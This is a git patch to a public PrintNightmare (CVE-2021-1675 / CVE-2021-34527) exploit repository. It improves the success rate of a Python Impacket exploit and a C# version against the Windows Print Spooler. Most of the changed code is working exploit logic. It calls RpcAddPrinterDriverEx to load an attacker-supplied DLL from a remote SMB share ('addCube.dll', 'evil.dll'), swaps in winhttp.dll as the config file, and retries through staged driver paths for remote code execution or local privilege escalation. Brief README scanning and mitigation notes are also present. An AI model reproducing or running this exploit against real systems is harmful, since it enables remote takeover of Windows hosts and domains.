From 2180daa2385c9d9875ef658720516771e0f696c4 Mon Sep 17 00:00:00 2001 From: cube0x0 Date: Sat, 3 Jul 2021 13:53:46 +0200 Subject: [PATCH] C# success rate and PoC improvement Signed-off-by: cube0x0 --- CVE-2021-1675.py | 60 ++++++++++-------- README.md | 8 +-- .../.vs/SharpPrintNightmare/v16/.suo | Bin 52224 -> 0 bytes SharpPrintNightmare/README.md | 4 +- .../.vs/SharpPrintNightmare/v16/.suo | Bin 41472 -> 0 bytes .../SharpPrintNightmare/Program.cs | 16 +++-- 6 files changed, 51 insertions(+), 37 deletions(-) delete mode 100644 SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo delete mode 100644 SharpPrintNightmare/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo diff --git a/CVE-2021-1675.py b/CVE-2021-1675.py index 7f5d527..1807985 100644 --- a/CVE-2021-1675.py +++ b/CVE-2021-1675.py @@ -5,7 +5,6 @@ from impacket.dcerpc.v5.dtypes import NULL from impacket.structure import Structure import argparse import sys -import time import pathlib #https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030 @@ -67,23 +66,7 @@ def getDrivers(dce, handle=NULL): return blob -def main(username, password, domain, lmhash, nthash, address, port, share): - #connect - dce = connect(username, password, domain, lmhash, nthash, address, port) - #handle = "\\\\{0}\x00".format(address) - handle = NULL - - #find "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL" path - try: - blob = getDrivers(dce, handle) - pDriverPath = str(pathlib.PureWindowsPath(blob['DriverPathArray']).parent) + '\\UNIDRV.DLL' - except Exception as e: - print('[-] Failed to enumerate remote pDriverPath') - print(str(e)) - sys.exit(1) - - print("[+] pDriverPath Found {0}".format(pDriverPath)) - +def main(dce, pDriverPath, share): #build DRIVER_CONTAINER package container_info = rprn.DRIVER_CONTAINER() container_info['Level'] = 2 @@ -93,14 +76,15 @@ def main(username, password, domain, lmhash, nthash, address, port, share): container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00" container_info['DriverInfo']['Level2']['pDriverPath'] = pDriverPath + '\x00' container_info['DriverInfo']['Level2']['pDataFile'] = "{0}\x00".format(share) - container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00" - + container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\winhttp.dll\x00" + flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000 filename = share.split("\\")[-1] - print("[*] Executing {0}".format(share)) resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) print("[*] Stage0: {0}".format(resp['ErrorCode'])) + + container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00" for i in range(1, 30): try: container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename) @@ -118,9 +102,11 @@ if __name__ == '__main__': parser = argparse.ArgumentParser(add_help = True, description = "CVE-2021-1675 implementation.",formatter_class=argparse.RawDescriptionHelpFormatter,epilog=""" Example; ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\\smb\\addCube.dll' +./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\smb\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL' """) parser.add_argument('target', action='store', help='[[domain/]username[:password]@]') parser.add_argument('share', action='store', help='Path to DLL. Example \'\\\\10.10.10.10\\share\\evil.dll\'') + parser.add_argument('pDriverPath', action='store', help='Driver path. Example \'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\'', nargs="?") group = parser.add_argument_group('authentication') group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') group = parser.add_argument_group('connection') @@ -161,12 +147,34 @@ Example; lmhash = '' nthash = '' + #connect + dce = connect(username, password, domain, lmhash, nthash, options.target_ip, options.port) + #handle = "\\\\{0}\x00".format(address) + handle = NULL + + #find "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL" path + if not options.pDriverPath: + try: + blob = getDrivers(dce, handle) + pDriverPath = str(pathlib.PureWindowsPath(blob['DriverPathArray']).parent) + '\\UNIDRV.DLL' + if not "filerepository" in pDriverPath: + print("[-] pDriverPath {0}, expected :\\Windows\\System32\\DriverStore\\FileRepository\\.....".format(pDriverPath)) + print("[-] Specify pDriverPath manually") + sys.exit(1) + except Exception as e: + print('[-] Failed to enumerate remote pDriverPath') + print(str(e)) + sys.exit(1) + else: + pDriverPath = options.pDriverPath + + print("[+] pDriverPath Found {0}".format(pDriverPath)) + print("[*] Executing {0}".format(options.share)) + #re-run if stage0/stageX fails print("[*] Try 1...") - main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share) - time.sleep(10) + main(dce, pDriverPath, options.share) print("[*] Try 2...") - main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share) - time.sleep(10) + main(dce, pDriverPath,options.share) print("[*] Try 3...") - main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share) \ No newline at end of file + main(dce, pDriverPath,options.share) \ No newline at end of file diff --git a/README.md b/README.md index 70d1568..5b7885d 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,4 @@ -# CVE-2021-1675 +# CVE-2021-1675 / CVE-2021-34527 Impacket implementation of the [PrintNightmare ](https://github.com/afwu/PrintNightmare) PoC originally created by Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370) @@ -86,9 +86,9 @@ REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_ ### Scanning -We can use `rpcdump.py` from impacket to scan for vulnerable hosts, if it returns a value, it's vulnerable +We can use `rpcdump.py` from impacket to scan for potential vulnerable hosts, if it returns a value, it could be vulnerable -``` +```bash rpcdump.py @192.168.1.10 | grep MS-RPRN Protocol: [MS-RPRN]: Print System Remote Protocol @@ -100,7 +100,7 @@ Disable Spooler service ```powershell Stop-Service Spooler -REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start " /t REG_DWORD /d "4" /f +REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f ``` Or Uninstall Print-Services diff --git a/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo b/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo deleted file mode 100644 index aad948ebd15e10f0d6e844b8b9993380a000f9a0..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 52224 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 maNg{*P}r>c--hWbN|*dM@WA{{R26B;pSM diff --git a/SharpPrintNightmare/README.md b/SharpPrintNightmare/README.md index 0350366..28f743d 100644 --- a/SharpPrintNightmare/README.md +++ b/SharpPrintNightmare/README.md @@ -1,7 +1,9 @@ -# C# Implementation of CVE-2021-1675 +# C# Implementation of CVE-2021-1675 / CVE-2021-34527 ### Usage +The RCE functionality might need to be executed with local administrator privileges on YOUR machine. + ``` #LPE C:\SharpPrintNightmare.exe C:\addCube.dll diff --git a/SharpPrintNightmare/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo b/SharpPrintNightmare/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo deleted file mode 100644 index ce63ce0ea8451d1e214f163aa63443e2968741e0..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 41472 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 i>pCN?&i` 2) { path = args[2]; @@ -117,13 +121,11 @@ namespace SharpPrintNightmare //pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL"; // 2019 debug //pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_addb31f9bff9e936\\Amd64\\UNIDRV.DLL"; // 2016 debug - Console.WriteLine($"[*] pDriverPath {pDriverPath}"); - Console.WriteLine($"[*] Executing {dllpath}"); //DRIVER_INFO_2 Level2 = drivers[0]; // debug DRIVER_INFO_2 Level2 = new DRIVER_INFO_2(); Level2.cVersion = 3; - Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll"; + Level2.pConfigFile = "C:\\Windows\\System32\\winhttp.dll"; //replace kernelbase with winhttp Level2.pDataFile = dllpath; Level2.pDriverPath = pDriverPath; Level2.pEnvironment = "Windows x64"; @@ -141,6 +143,8 @@ namespace SharpPrintNightmare Console.WriteLine("[*] Stage 0: " + Marshal.GetLastWin32Error()); Marshal.FreeHGlobal(pnt); + //Specify a dll that does not exists in C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ + Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll"; for (int i = 1; i <= 30; i++) { //add path to our exploit